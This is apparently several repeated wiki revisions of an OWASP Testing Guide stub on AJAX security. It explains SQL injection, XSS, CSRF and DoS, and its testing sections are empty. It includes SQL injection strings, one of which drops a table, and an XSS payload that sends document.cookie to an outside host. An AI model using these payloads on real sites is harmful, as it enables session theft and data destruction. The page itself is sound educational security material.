'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its security implications.The security issues in Ajax include 
* Create a larger attack surface with many more inputs to secure 

* Expose internal functions of the Web application server 

* Allow a client-side script to access third-party resources with no built-in security and encoding mechanisms 

* Login Information and Intrusion Detection
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database. 

More on SQL Injection can be found at [http://www.owasp.org/index.php/SQL_Injection_AoC, SQL Injection (OWASP Testing Guide v2)].
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Client Side Injection Threats''' 
* ''XSS exploits'' can give access to any client-side data and can also modify the client-side code.
 
* ''DOM Injection'' - It is a type pf XSS injection which happens through the sub-objects ,document.location or document.URL or document.referrer of the Document Object Model(DOM)
<pre>
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT></pre> 
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content. 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Denial of Service is an old attack where an attacker or vulnerable application force the user to launch multiple XMLHttpRequests to a target application against the wishes of the user. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using image tags nested within a JavaScript loop can do the trick more effectively. AJAX being on the client-side makes the attack easier.<pre><IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"></pre>
 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Major Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.

== Black Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== References ==

*[http://en.wikipedia.org/wiki/AJAX AJAX] 

;'''Whitepapers''' 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf Billy Hoffman, "Ajax(in) Security",SPI Labs] 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf Billy Hoffman, "Analysis of Web Application Worms and Viruses",SPI Labs] 
*[http://www.spidynamics.com/assets/documents/AJAXdangers.pdf Billy Hoffman, "Ajax Security Dangers",SPI Labs] 

;'''Articles''' 
*[http://www.adaptivepath.com/publications/essays/archives/000385.php Jesse James Garrett. “Ajax: A New Approach to Web Applications”, Adaptive Path] 
*[http://www.webappsec.org/projects/articles/071105.html Amit Klein. "DOM Based Cross Site Scripting or XSS of the Third Kind : A look at an overlooked flavor of XSS", Web Application Security Consortium] 

'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-05T21:33:24Z

Anushshetty: /* Attacks and Vulnerabilities */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its security implications.The security issues in Ajax include 
* Create a larger attack surface with many more inputs to secure 

* Expose internal functions of the Web application server 

* Allow a client-side script to access third-party resources with no built-in security and encoding mechanisms 

* Login Information and Intrusion Detection
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database. 

More on SQL Injection can be found at [http://www.owasp.org/index.php/SQL_Injection_AoC, SQL Injection (OWASP Testing Guide v2)].
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Client Side Injection Threats''' 
* ''XSS exploits'' can give access to any client-side data and can also modify the client-side code.
 
* ''DOM Injection'' - It is a type pf XSS injection which happens through the sub-objects ,document.location or document.URL or document.referrer of the Document Object Model(DOM)
<pre>
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT></pre> 
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content. 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Yes, it is possible for a rogue or vulnerable application to force a user to launch multiple XMLHttpRequests to a target application, but this has been possible before AJAX. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using <IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"> nested within a JavaScript loop can do the trick more effectively. If anything, I predict poorly thought out infrastructure and application design is likely to cause AJAX applications to inadvertently DOS themselves due to too frequent XMLHttpRequests.

 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Major Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.

== Black Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== References ==

*[http://en.wikipedia.org/wiki/AJAX AJAX] 

;'''Whitepapers''' 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf Billy Hoffman, "Ajax(in) Security",SPI Labs] 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf Billy Hoffman, "Analysis of Web Application Worms and Viruses",SPI Labs] 
*[http://www.spidynamics.com/assets/documents/AJAXdangers.pdf Billy Hoffman, "Ajax Security Dangers",SPI Labs] 

;'''Articles''' 
*[http://www.adaptivepath.com/publications/essays/archives/000385.php Jesse James Garrett. “Ajax: A New Approach to Web Applications”, Adaptive Path] 
*[http://www.webappsec.org/projects/articles/071105.html Amit Klein. "DOM Based Cross Site Scripting or XSS of the Third Kind : A look at an overlooked flavor of XSS", Web Application Security Consortium] 

'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-05T21:30:41Z

Anushshetty: /* Attacks and Vulnerabilities */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its security implications.The security issues in Ajax include 
* Create a larger attack surface with many more inputs to secure 

* Expose internal functions of the Web application server 

* Allow a client-side script to access third-party resources with no built-in security and encoding mechanisms 

* Login Information and Intrusion Detection
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database. 

More about SQL Injection can be found at [http://www.owasp.org/index.php/SQL_Injection_AoC, SQL Injection (OWASP Testing Guide v2)].
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Client Side Injection Threats''' 
* ''XSS exploits'' can give access to any client-side data and can also modify the client-side code.
 
* ''DOM Injection'' - It is a type pf XSS injection which happens through the sub-objects ,document.location or document.URL or document.referrer of the Document Object Model(DOM)
<pre>
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT></pre> 
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content. 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Yes, it is possible for a rogue or vulnerable application to force a user to launch multiple XMLHttpRequests to a target application, but this has been possible before AJAX. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using <IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"> nested within a JavaScript loop can do the trick more effectively. If anything, I predict poorly thought out infrastructure and application design is likely to cause AJAX applications to inadvertently DOS themselves due to too frequent XMLHttpRequests.

 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Major Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.

== Black Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== References ==

*[http://en.wikipedia.org/wiki/AJAX AJAX] 

;'''Whitepapers''' 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf Billy Hoffman, "Ajax(in) Security",SPI Labs] 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf Billy Hoffman, "Analysis of Web Application Worms and Viruses",SPI Labs] 
*[http://www.spidynamics.com/assets/documents/AJAXdangers.pdf Billy Hoffman, "Ajax Security Dangers",SPI Labs] 

;'''Articles''' 
*[http://www.adaptivepath.com/publications/essays/archives/000385.php Jesse James Garrett. “Ajax: A New Approach to Web Applications”, Adaptive Path] 
*[http://www.webappsec.org/projects/articles/071105.html Amit Klein. "DOM Based Cross Site Scripting or XSS of the Third Kind : A look at an overlooked flavor of XSS", Web Application Security Consortium] 

'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-05T21:27:49Z

Anushshetty: /* References */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its security implications.The security issues in Ajax include 
* Create a larger attack surface with many more inputs to secure 

* Expose internal functions of the Web application server 

* Allow a client-side script to access third-party resources with no built-in security and encoding mechanisms 

* Login Information and Intrusion Detection
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database.
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Client Side Injection Threats''' 
* ''XSS exploits'' can give access to any client-side data and can also modify the client-side code.
 
* ''DOM Injection'' - It is a type pf XSS injection which happens through the sub-objects ,document.location or document.URL or document.referrer of the Document Object Model(DOM)
<pre>
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT></pre> 
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content. 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Yes, it is possible for a rogue or vulnerable application to force a user to launch multiple XMLHttpRequests to a target application, but this has been possible before AJAX. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using <IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"> nested within a JavaScript loop can do the trick more effectively. If anything, I predict poorly thought out infrastructure and application design is likely to cause AJAX applications to inadvertently DOS themselves due to too frequent XMLHttpRequests.

 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Major Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.

== Black Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== References ==

